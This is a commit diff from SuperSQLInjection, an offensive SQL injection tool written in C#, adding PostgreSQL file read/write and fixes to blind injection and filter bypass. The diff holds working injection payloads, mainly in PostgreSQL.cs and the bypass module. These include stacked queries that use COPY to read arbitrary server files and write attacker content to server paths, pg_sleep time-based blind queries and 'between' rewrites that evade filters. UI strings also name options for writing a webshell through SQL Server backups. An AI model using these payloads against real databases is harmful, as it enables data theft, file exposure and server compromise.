update20181221
20181221 V1.0 正式版--- 修复盲注关键字判断机制,自动识别时,关键字相同且状态码相同才认为是true页面,解决在部分情况下可能出现错误500页面也存在同样关键字的问题。 修改SQLServer查询列时,使用char函数方式,避免单引号被过滤导致无法获取列名的问题。 修复SQLServer 执行命令,读写文件时,可能由于语句报错而导致读写文件失败的问题,优化提高成功率。 修复betweent and绕过时,将16进制字符替换了,导致语句错误而无法获取数据的问题。 修复自动识别在某些情况下跳过了错误显示注入检查。 修复Union注入重复发包判断列情况。 修复自动识别注入,在部分情况下无法正确判断数据库类型的问题。 修改爆出注入配置文件,降低漏报。 优化自动识别注入,如果程序判断支持盲注,会自动尝试使用order by去判断页面列数,提高Union注入检查的速度。 新增支持注入PostgreSQL文件读写功能。
This commit is contained in:
shack2
57
SuperSQLInjection/Main.Designer.cs
generated
57
SuperSQLInjection/Main.Designer.cs
generated
@@ -92,6 +92,7 @@
|
|||||||
this.tab_file = new System.Windows.Forms.TabPage();
|
this.tab_file = new System.Windows.Forms.TabPage();
|
||||||
this.file_txt_result = new System.Windows.Forms.TextBox();
|
this.file_txt_result = new System.Windows.Forms.TextBox();
|
||||||
this.groupBox7 = new System.Windows.Forms.GroupBox();
|
this.groupBox7 = new System.Windows.Forms.GroupBox();
|
||||||
|
this.file_btn_stop = new System.Windows.Forms.Button();
|
||||||
this.file_btn_start = new System.Windows.Forms.Button();
|
this.file_btn_start = new System.Windows.Forms.Button();
|
||||||
this.file_cbox_readWrite = new System.Windows.Forms.ComboBox();
|
this.file_cbox_readWrite = new System.Windows.Forms.ComboBox();
|
||||||
this.file_txt_filePath = new System.Windows.Forms.TextBox();
|
this.file_txt_filePath = new System.Windows.Forms.TextBox();
|
||||||
@@ -198,6 +199,7 @@
|
|||||||
this.cmd_txt_result = new System.Windows.Forms.TextBox();
|
this.cmd_txt_result = new System.Windows.Forms.TextBox();
|
||||||
this.groupBox8 = new System.Windows.Forms.GroupBox();
|
this.groupBox8 = new System.Windows.Forms.GroupBox();
|
||||||
this.cmd_chk_showCmdResult = new System.Windows.Forms.CheckBox();
|
this.cmd_chk_showCmdResult = new System.Windows.Forms.CheckBox();
|
||||||
|
this.cmd_btn_stop = new System.Windows.Forms.Button();
|
||||||
this.cmd_btn_start = new System.Windows.Forms.Button();
|
this.cmd_btn_start = new System.Windows.Forms.Button();
|
||||||
this.cmd_txt_cmd = new System.Windows.Forms.TextBox();
|
this.cmd_txt_cmd = new System.Windows.Forms.TextBox();
|
||||||
this.label15 = new System.Windows.Forms.Label();
|
this.label15 = new System.Windows.Forms.Label();
|
||||||
@@ -231,6 +233,7 @@
|
|||||||
this.bypass_delselect = new System.Windows.Forms.ToolStripMenuItem();
|
this.bypass_delselect = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
this.bypass_btn_addReplaceStr = new System.Windows.Forms.Button();
|
this.bypass_btn_addReplaceStr = new System.Windows.Forms.Button();
|
||||||
this.label19 = new System.Windows.Forms.Label();
|
this.label19 = new System.Windows.Forms.Label();
|
||||||
|
this.tab_useDB = new System.Windows.Forms.TabPage();
|
||||||
this.tab_encoding = new System.Windows.Forms.TabPage();
|
this.tab_encoding = new System.Windows.Forms.TabPage();
|
||||||
this.groupBox13 = new System.Windows.Forms.GroupBox();
|
this.groupBox13 = new System.Windows.Forms.GroupBox();
|
||||||
this.label21 = new System.Windows.Forms.Label();
|
this.label21 = new System.Windows.Forms.Label();
|
||||||
@@ -1022,6 +1025,7 @@
|
|||||||
//
|
//
|
||||||
// groupBox7
|
// groupBox7
|
||||||
//
|
//
|
||||||
|
this.groupBox7.Controls.Add(this.file_btn_stop);
|
||||||
this.groupBox7.Controls.Add(this.file_btn_start);
|
this.groupBox7.Controls.Add(this.file_btn_start);
|
||||||
this.groupBox7.Controls.Add(this.file_cbox_readWrite);
|
this.groupBox7.Controls.Add(this.file_cbox_readWrite);
|
||||||
this.groupBox7.Controls.Add(this.file_txt_filePath);
|
this.groupBox7.Controls.Add(this.file_txt_filePath);
|
||||||
@@ -1036,11 +1040,21 @@
|
|||||||
this.groupBox7.TabStop = false;
|
this.groupBox7.TabStop = false;
|
||||||
this.groupBox7.Text = "文件操作";
|
this.groupBox7.Text = "文件操作";
|
||||||
//
|
//
|
||||||
|
// file_btn_stop
|
||||||
|
//
|
||||||
|
this.file_btn_stop.Location = new System.Drawing.Point(748, 30);
|
||||||
|
this.file_btn_stop.Name = "file_btn_stop";
|
||||||
|
this.file_btn_stop.Size = new System.Drawing.Size(69, 23);
|
||||||
|
this.file_btn_stop.TabIndex = 12;
|
||||||
|
this.file_btn_stop.Text = "停止";
|
||||||
|
this.file_btn_stop.UseVisualStyleBackColor = true;
|
||||||
|
this.file_btn_stop.Click += new System.EventHandler(this.file_btn_stop_Click);
|
||||||
|
//
|
||||||
// file_btn_start
|
// file_btn_start
|
||||||
//
|
//
|
||||||
this.file_btn_start.Location = new System.Drawing.Point(717, 28);
|
this.file_btn_start.Location = new System.Drawing.Point(659, 30);
|
||||||
this.file_btn_start.Name = "file_btn_start";
|
this.file_btn_start.Name = "file_btn_start";
|
||||||
this.file_btn_start.Size = new System.Drawing.Size(100, 23);
|
this.file_btn_start.Size = new System.Drawing.Size(69, 23);
|
||||||
this.file_btn_start.TabIndex = 12;
|
this.file_btn_start.TabIndex = 12;
|
||||||
this.file_btn_start.Text = "开始";
|
this.file_btn_start.Text = "开始";
|
||||||
this.file_btn_start.UseVisualStyleBackColor = true;
|
this.file_btn_start.UseVisualStyleBackColor = true;
|
||||||
@@ -1050,17 +1064,9 @@
|
|||||||
//
|
//
|
||||||
this.file_cbox_readWrite.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
|
this.file_cbox_readWrite.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
|
||||||
this.file_cbox_readWrite.FormattingEnabled = true;
|
this.file_cbox_readWrite.FormattingEnabled = true;
|
||||||
this.file_cbox_readWrite.Items.AddRange(new object[] {
|
|
||||||
"MySQL Load_File读文件",
|
|
||||||
"MySQL Union写文件",
|
|
||||||
"SQLServer FileSystemObject写文件",
|
|
||||||
"SQLServer Sp_MakeWebTask写文件",
|
|
||||||
"SQLServer 备份写WebShell(有多余数据)",
|
|
||||||
"SQLServer FileSystemObject读文件",
|
|
||||||
"加载获取IIS虚拟网站信息VBS"});
|
|
||||||
this.file_cbox_readWrite.Location = new System.Drawing.Point(409, 31);
|
this.file_cbox_readWrite.Location = new System.Drawing.Point(409, 31);
|
||||||
this.file_cbox_readWrite.Name = "file_cbox_readWrite";
|
this.file_cbox_readWrite.Name = "file_cbox_readWrite";
|
||||||
this.file_cbox_readWrite.Size = new System.Drawing.Size(291, 20);
|
this.file_cbox_readWrite.Size = new System.Drawing.Size(230, 20);
|
||||||
this.file_cbox_readWrite.TabIndex = 2;
|
this.file_cbox_readWrite.TabIndex = 2;
|
||||||
this.file_cbox_readWrite.SelectedIndexChanged += new System.EventHandler(this.file_cbox_readWrite_SelectedIndexChanged);
|
this.file_cbox_readWrite.SelectedIndexChanged += new System.EventHandler(this.file_cbox_readWrite_SelectedIndexChanged);
|
||||||
//
|
//
|
||||||
@@ -2111,6 +2117,7 @@
|
|||||||
this.mytab.Controls.Add(this.tab_file);
|
this.mytab.Controls.Add(this.tab_file);
|
||||||
this.mytab.Controls.Add(this.tab_cmd);
|
this.mytab.Controls.Add(this.tab_cmd);
|
||||||
this.mytab.Controls.Add(this.tab_bypass);
|
this.mytab.Controls.Add(this.tab_bypass);
|
||||||
|
this.mytab.Controls.Add(this.tab_useDB);
|
||||||
this.mytab.Controls.Add(this.tab_encoding);
|
this.mytab.Controls.Add(this.tab_encoding);
|
||||||
this.mytab.Controls.Add(this.tab_scanInjection);
|
this.mytab.Controls.Add(this.tab_scanInjection);
|
||||||
this.mytab.Controls.Add(this.tab_injectLog);
|
this.mytab.Controls.Add(this.tab_injectLog);
|
||||||
@@ -2150,6 +2157,7 @@
|
|||||||
// groupBox8
|
// groupBox8
|
||||||
//
|
//
|
||||||
this.groupBox8.Controls.Add(this.cmd_chk_showCmdResult);
|
this.groupBox8.Controls.Add(this.cmd_chk_showCmdResult);
|
||||||
|
this.groupBox8.Controls.Add(this.cmd_btn_stop);
|
||||||
this.groupBox8.Controls.Add(this.cmd_btn_start);
|
this.groupBox8.Controls.Add(this.cmd_btn_start);
|
||||||
this.groupBox8.Controls.Add(this.cmd_txt_cmd);
|
this.groupBox8.Controls.Add(this.cmd_txt_cmd);
|
||||||
this.groupBox8.Controls.Add(this.label15);
|
this.groupBox8.Controls.Add(this.label15);
|
||||||
@@ -2174,6 +2182,16 @@
|
|||||||
this.cmd_chk_showCmdResult.UseVisualStyleBackColor = true;
|
this.cmd_chk_showCmdResult.UseVisualStyleBackColor = true;
|
||||||
this.cmd_chk_showCmdResult.CheckedChanged += new System.EventHandler(this.cmd_chk_showCmdResult_CheckedChanged);
|
this.cmd_chk_showCmdResult.CheckedChanged += new System.EventHandler(this.cmd_chk_showCmdResult_CheckedChanged);
|
||||||
//
|
//
|
||||||
|
// cmd_btn_stop
|
||||||
|
//
|
||||||
|
this.cmd_btn_stop.Location = new System.Drawing.Point(592, 28);
|
||||||
|
this.cmd_btn_stop.Name = "cmd_btn_stop";
|
||||||
|
this.cmd_btn_stop.Size = new System.Drawing.Size(75, 23);
|
||||||
|
this.cmd_btn_stop.TabIndex = 12;
|
||||||
|
this.cmd_btn_stop.Text = "停止";
|
||||||
|
this.cmd_btn_stop.UseVisualStyleBackColor = true;
|
||||||
|
this.cmd_btn_stop.Click += new System.EventHandler(this.cmd_btn_stop_Click);
|
||||||
|
//
|
||||||
// cmd_btn_start
|
// cmd_btn_start
|
||||||
//
|
//
|
||||||
this.cmd_btn_start.Location = new System.Drawing.Point(496, 28);
|
this.cmd_btn_start.Location = new System.Drawing.Point(496, 28);
|
||||||
@@ -2549,6 +2567,16 @@
|
|||||||
this.label19.TabIndex = 5;
|
this.label19.TabIndex = 5;
|
||||||
this.label19.Text = "将字符";
|
this.label19.Text = "将字符";
|
||||||
//
|
//
|
||||||
|
// tab_useDB
|
||||||
|
//
|
||||||
|
this.tab_useDB.Location = new System.Drawing.Point(4, 23);
|
||||||
|
this.tab_useDB.Name = "tab_useDB";
|
||||||
|
this.tab_useDB.Padding = new System.Windows.Forms.Padding(3);
|
||||||
|
this.tab_useDB.Size = new System.Drawing.Size(832, 451);
|
||||||
|
this.tab_useDB.TabIndex = 11;
|
||||||
|
this.tab_useDB.Text = "数据库利用";
|
||||||
|
this.tab_useDB.UseVisualStyleBackColor = true;
|
||||||
|
//
|
||||||
// tab_encoding
|
// tab_encoding
|
||||||
//
|
//
|
||||||
this.tab_encoding.Controls.Add(this.groupBox13);
|
this.tab_encoding.Controls.Add(this.groupBox13);
|
||||||
@@ -2610,7 +2638,9 @@
|
|||||||
"Base64Encode",
|
"Base64Encode",
|
||||||
"字符转Unicode",
|
"字符转Unicode",
|
||||||
"字符转16进制(UTF-8编码)",
|
"字符转16进制(UTF-8编码)",
|
||||||
"MD5加密"});
|
"MD5加密",
|
||||||
|
"字符串转chr",
|
||||||
|
"字符串转char"});
|
||||||
this.encode_cbox_encode.Location = new System.Drawing.Point(103, 25);
|
this.encode_cbox_encode.Location = new System.Drawing.Point(103, 25);
|
||||||
this.encode_cbox_encode.Name = "encode_cbox_encode";
|
this.encode_cbox_encode.Name = "encode_cbox_encode";
|
||||||
this.encode_cbox_encode.Size = new System.Drawing.Size(200, 20);
|
this.encode_cbox_encode.Size = new System.Drawing.Size(200, 20);
|
||||||
@@ -3690,6 +3720,9 @@
|
|||||||
private System.Windows.Forms.ToolStripMenuItem tsmi_injectLog_clearAllLog;
|
private System.Windows.Forms.ToolStripMenuItem tsmi_injectLog_clearAllLog;
|
||||||
private System.Windows.Forms.ColumnHeader injectlog_col_ip;
|
private System.Windows.Forms.ColumnHeader injectlog_col_ip;
|
||||||
private System.Windows.Forms.ColumnHeader injectlog_col_port;
|
private System.Windows.Forms.ColumnHeader injectlog_col_port;
|
||||||
|
private System.Windows.Forms.TabPage tab_useDB;
|
||||||
|
private System.Windows.Forms.Button cmd_btn_stop;
|
||||||
|
private System.Windows.Forms.Button file_btn_stop;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -186,7 +186,7 @@
|
|||||||
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
|
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
|
||||||
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
|
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
|
||||||
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq
|
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq
|
||||||
DQAAAk1TRnQBSQFMAgEBBwEAARgBBwEYAQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
|
DQAAAk1TRnQBSQFMAgEBBwEAASgBBwEoAQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
|
||||||
AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
|
AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
|
||||||
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
|
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
|
||||||
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
|
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
|
||||||
@@ -291,7 +291,7 @@
|
|||||||
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
|
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
|
||||||
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
|
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
|
||||||
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAAAC
|
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAAAC
|
||||||
EwAAAk1TRnQBSQFMAgEBCgEAAZgBBwGYAQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
|
EwAAAk1TRnQBSQFMAgEBCgEAAagBBwGoAQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
|
||||||
AwABQAMAATADAAEBAQABCAYAAQwYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
|
AwABQAMAATADAAEBAQABCAYAAQwYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
|
||||||
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
|
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
|
||||||
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
|
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
|
||||||
|
|||||||
@@ -32,5 +32,5 @@ using System.Runtime.InteropServices;
|
|||||||
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
|
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
|
||||||
// 方法是按如下所示使用“*”:
|
// 方法是按如下所示使用“*”:
|
||||||
// [assembly: AssemblyVersion("1.0.*")]
|
// [assembly: AssemblyVersion("1.0.*")]
|
||||||
[assembly: AssemblyVersion("1.2018.12.13")]
|
[assembly: AssemblyVersion("1.2018.12.21")]
|
||||||
[assembly: AssemblyFileVersion("1.2018.12.13")]
|
[assembly: AssemblyFileVersion("1.2018.12.21")]
|
||||||
|
|||||||
@@ -138,6 +138,7 @@
|
|||||||
<Compile Include="payload\Access.cs" />
|
<Compile Include="payload\Access.cs" />
|
||||||
<Compile Include="payload\Comm.cs" />
|
<Compile Include="payload\Comm.cs" />
|
||||||
<Compile Include="model\Injection.cs" />
|
<Compile Include="model\Injection.cs" />
|
||||||
|
<Compile Include="payload\DBPayload.cs" />
|
||||||
<Compile Include="payload\PostgreSQL.cs" />
|
<Compile Include="payload\PostgreSQL.cs" />
|
||||||
<Compile Include="payload\MySQL.cs" />
|
<Compile Include="payload\MySQL.cs" />
|
||||||
<Compile Include="payload\SQLServer.cs" />
|
<Compile Include="payload\SQLServer.cs" />
|
||||||
|
|||||||
@@ -217,9 +217,10 @@ namespace SuperSQLInjection.bypass
|
|||||||
String newpayload = "";
|
String newpayload = "";
|
||||||
if (config.useBetweenByPass)
|
if (config.useBetweenByPass)
|
||||||
{
|
{
|
||||||
Match m = Regex.Match(paylaod, @"(?<str>[\>\<\=]+)(?<len>\d+)");
|
//只能匹配数字1-9,如果是0,可能会替换16进制,导致语句出错
|
||||||
|
Match m = Regex.Match(paylaod, @"(?<str>[\>\<\=]+)(?<len>[1-9]+)");
|
||||||
String str = m.Groups["str"].Value;
|
String str = m.Groups["str"].Value;
|
||||||
|
String replaceReg = @"[\>\=]+[1-9]+";
|
||||||
if (String.IsNullOrEmpty(m.Groups["len"].Value))
|
if (String.IsNullOrEmpty(m.Groups["len"].Value))
|
||||||
{
|
{
|
||||||
return paylaod;
|
return paylaod;
|
||||||
@@ -227,25 +228,25 @@ namespace SuperSQLInjection.bypass
|
|||||||
int len = Tools.convertToInt(m.Groups["len"].Value);
|
int len = Tools.convertToInt(m.Groups["len"].Value);
|
||||||
if (str.Equals(">="))
|
if (str.Equals(">="))
|
||||||
{
|
{
|
||||||
newpayload = Regex.Replace(paylaod, @"[\>\=]+\d+", " not between 0 and " + (len - 1));
|
newpayload = Regex.Replace(paylaod, replaceReg, " not between 0 and " + (len - 1));
|
||||||
|
|
||||||
}
|
}
|
||||||
else if (str.Equals(">"))
|
else if (str.Equals(">"))
|
||||||
{
|
{
|
||||||
|
|
||||||
newpayload = Regex.Replace(paylaod, @"[\>\=]+\d+", " not between 0 and " + len);
|
newpayload = Regex.Replace(paylaod, replaceReg, " not between 0 and " + len);
|
||||||
}
|
}
|
||||||
else if (str.Equals("="))
|
else if (str.Equals("="))
|
||||||
{
|
{
|
||||||
newpayload = Regex.Replace(paylaod, @"[\>\=]+\d+", " between " + len + " and " + len);
|
newpayload = Regex.Replace(paylaod, replaceReg, " between " + len + " and " + len);
|
||||||
}
|
}
|
||||||
else if (str.Equals("<="))
|
else if (str.Equals("<="))
|
||||||
{
|
{
|
||||||
newpayload = Regex.Replace(paylaod, @"[\<\=]+\d+", " between 0 and " + len);
|
newpayload = Regex.Replace(paylaod, replaceReg, " between 0 and " + len);
|
||||||
}
|
}
|
||||||
else if (str.Equals("<"))
|
else if (str.Equals("<"))
|
||||||
{
|
{
|
||||||
newpayload = Regex.Replace(paylaod, @"[\<=]+\d+", " between 0 and " + (len - 1));
|
newpayload = Regex.Replace(paylaod, replaceReg, " between 0 and " + (len - 1));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
|
|||||||
@@ -28,6 +28,7 @@ namespace SuperSQLInjection.model
|
|||||||
public String request = "";
|
public String request = "";
|
||||||
public String sencondRequest = "";
|
public String sencondRequest = "";
|
||||||
public String key = "";
|
public String key = "";
|
||||||
|
public int injectHTTPCode = 0;//注入逻辑为真的时候页面的状态码
|
||||||
public String db_encoding = "";
|
public String db_encoding = "";
|
||||||
public Boolean useCode = false;
|
public Boolean useCode = false;
|
||||||
public int columnsCount = 0;
|
public int columnsCount = 0;
|
||||||
|
|||||||
12
SuperSQLInjection/payload/DBPayload.cs
Normal file
12
SuperSQLInjection/payload/DBPayload.cs
Normal file
@@ -0,0 +1,12 @@
|
|||||||
|
using System;
|
||||||
|
using System.Collections.Generic;
|
||||||
|
using System.Linq;
|
||||||
|
using System.Text;
|
||||||
|
|
||||||
|
namespace SuperSQLInjection.payload
|
||||||
|
{
|
||||||
|
class DBPayload
|
||||||
|
{
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -28,8 +28,6 @@ namespace SuperSQLInjection.payload
|
|||||||
//获取列名称
|
//获取列名称
|
||||||
public static String column_value = "(select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{table}' limit {index},1)";
|
public static String column_value = "(select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{table}' limit {index},1)";
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
public static String bool_length = "char_length({data})";
|
public static String bool_length = "char_length({data})";
|
||||||
public static String bool_value = "ascii(mid({data},{index},1))";
|
public static String bool_value = "ascii(mid({data},{index},1))";
|
||||||
public static String mid_value = "(mid({data},{index},1))";
|
public static String mid_value = "(mid({data},{index},1))";
|
||||||
@@ -370,6 +368,16 @@ namespace SuperSQLInjection.payload
|
|||||||
String data = data_value_orderBy.Replace("{columns}", column).Replace("{orderby}", orderBy).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
|
String data = data_value_orderBy.Replace("{columns}", column).Replace("{orderby}", orderBy).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
|
||||||
return data;
|
return data;
|
||||||
}
|
}
|
||||||
|
/// <summary>
|
||||||
|
/// 反射条调用,加载显示支持的文件操作
|
||||||
|
/// </summary>
|
||||||
|
/// <returns></returns>
|
||||||
|
public static List<String> getShowCanDoFile() {
|
||||||
|
List<String> list = new List<String>();
|
||||||
|
list.Add("MySQL Load_File读文件");
|
||||||
|
list.Add("MySQL Union写文件");
|
||||||
|
return list;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -11,7 +11,7 @@ namespace SuperSQLInjection.payload
|
|||||||
public static String path = "config/vers/postgresql.txt";
|
public static String path = "config/vers/postgresql.txt";
|
||||||
public static List<String> vers = FileTool.readFileToList(path);
|
public static List<String> vers = FileTool.readFileToList(path);
|
||||||
|
|
||||||
public static String char_length = "(select char_length({data}))";
|
public static String char_length = "(char_length({data}))";
|
||||||
|
|
||||||
//数据库数量
|
//数据库数量
|
||||||
public static String dbs_count = "(select count(distinct(schemaname)) from pg_tables)";
|
public static String dbs_count = "(select count(distinct(schemaname)) from pg_tables)";
|
||||||
@@ -34,6 +34,8 @@ namespace SuperSQLInjection.payload
|
|||||||
|
|
||||||
public static String bool_value = "ascii(substring(cast({data} as text),{index},1))";
|
public static String bool_value = "ascii(substring(cast({data} as text),{index},1))";
|
||||||
|
|
||||||
|
public static String bool_data = " {data}>{len}";
|
||||||
|
|
||||||
public static String substr_one_value = "(substring(cast({data} as text),{index},1))";
|
public static String substr_one_value = "(substring(cast({data} as text),{index},1))";
|
||||||
|
|
||||||
//获取数据库数量bool方式
|
//获取数据库数量bool方式
|
||||||
@@ -55,6 +57,9 @@ namespace SuperSQLInjection.payload
|
|||||||
//bool方式获取值
|
//bool方式获取值
|
||||||
public static String ver_value = " "+ bool_value + ">{len}";
|
public static String ver_value = " "+ bool_value + ">{len}";
|
||||||
|
|
||||||
|
//bool方式获取值
|
||||||
|
public static String char_length_val = " " + char_length + ">{len}";
|
||||||
|
|
||||||
//bool方式获取值
|
//bool方式获取值
|
||||||
public static String bool_ord_value = " " + substr_one_value + ">{len}";
|
public static String bool_ord_value = " " + substr_one_value + ">{len}";
|
||||||
|
|
||||||
@@ -80,6 +85,24 @@ namespace SuperSQLInjection.payload
|
|||||||
|
|
||||||
public static String substr_value = "(select substr({data},{start},{len}))";
|
public static String substr_value = "(select substr({data},{start},{len}))";
|
||||||
|
|
||||||
|
public static String readFile = " 1=1;drop table if exists ssqlinjection;create table ssqlinjection(data text);copy ssqlinjection from '{path}';--";
|
||||||
|
|
||||||
|
public static String createTable = " 1=1;drop table if exists ssqlinjection;create table ssqlinjection (data text);--";
|
||||||
|
|
||||||
|
public static String insertLineValue = " 1=1;insert into ssqlinjection(data) values ('{content}');--";
|
||||||
|
|
||||||
|
public static String writeFile = " 1=1;copy ssqlinjection(data) to '{path}';--";
|
||||||
|
|
||||||
|
|
||||||
|
public static String drop_table = " 1=1;drop table if exists ssqlinjection;--";
|
||||||
|
|
||||||
|
|
||||||
|
public static String file_content = "(select data from ssqlinjection)";
|
||||||
|
public static String file_content_Count = "(select count(1) from ssqlinjection)";
|
||||||
|
public static String file_content_data = "(select data from ssqlinjection offset {index} limit 1)";
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
public static String getBoolDataBySleep(String data,int maxTime)
|
public static String getBoolDataBySleep(String data,int maxTime)
|
||||||
{
|
{
|
||||||
return " 1=(case when ((" + data + ")>{len}) then (select 1 from pg_sleep(" + maxTime + ")) else 1 end)";
|
return " 1=(case when ((" + data + ")>{len}) then (select 1 from pg_sleep(" + maxTime + ")) else 1 end)";
|
||||||
@@ -90,6 +113,8 @@ namespace SuperSQLInjection.payload
|
|||||||
return " 1=(case when ((" + data + ")) then (select 1 from pg_sleep(" + maxTime + ")) else 1 end)";
|
return " 1=(case when ((" + data + ")) then (select 1 from pg_sleep(" + maxTime + ")) else 1 end)";
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
/// <summary>
|
/// <summary>
|
||||||
///
|
///
|
||||||
@@ -108,46 +133,17 @@ namespace SuperSQLInjection.payload
|
|||||||
return error_value.Replace("{data}", d);
|
return error_value.Replace("{data}", d);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
public static String getReadFilePayload(String path)
|
||||||
|
|
||||||
public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,String fill,String data)
|
|
||||||
{
|
{
|
||||||
StringBuilder sb = new StringBuilder();
|
return readFile.Replace("{path}", path);
|
||||||
for (int i = 1; i <= columnsLen; i++)
|
|
||||||
{
|
|
||||||
|
|
||||||
if (i == showIndex)
|
|
||||||
{
|
|
||||||
sb.Append(concatMySQLColumn(data) + ",");
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
|
|
||||||
sb.Append(fill+",");
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return sb.Remove(sb.Length - 1, 1).ToString();
|
|
||||||
}
|
}
|
||||||
|
public static String getInsertLineValue(String content)
|
||||||
public static String creatMySQLWriteFileByUnion(int columnsLen, int dataIndex,String fill, String path,String content)
|
|
||||||
{
|
{
|
||||||
StringBuilder sb = new StringBuilder(" 1=1 union select ");
|
return insertLineValue.Replace("{content}", content);
|
||||||
for (int i = 1; i <= columnsLen; i++)
|
}
|
||||||
{
|
public static String getWriteFilePayload(String path)
|
||||||
|
{
|
||||||
if (i == dataIndex)
|
return writeFile.Replace("{path}", path);
|
||||||
{
|
|
||||||
sb.Append(Tools.strToHex(content,"UTF-8")+",");
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
|
|
||||||
sb.Append(fill+",");
|
|
||||||
}
|
|
||||||
}
|
|
||||||
sb.Remove(sb.Length - 1, 1);
|
|
||||||
sb.Append(" into dumpfile '"+path+"'");
|
|
||||||
return sb.ToString();
|
|
||||||
}
|
}
|
||||||
public static String getUnionDataValue(int columnsLen, int showIndex, String dataPayLoad, String dbname, String table, String index)
|
public static String getUnionDataValue(int columnsLen, int showIndex, String dataPayLoad, String dbname, String table, String index)
|
||||||
{
|
{
|
||||||
@@ -167,6 +163,9 @@ namespace SuperSQLInjection.payload
|
|||||||
sb.Remove(sb.Length - 1, 1);
|
sb.Remove(sb.Length - 1, 1);
|
||||||
return union_value.Replace("{data}", sb.ToString());
|
return union_value.Replace("{data}", sb.ToString());
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
|
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
|
||||||
{
|
{
|
||||||
StringBuilder sb = new StringBuilder();
|
StringBuilder sb = new StringBuilder();
|
||||||
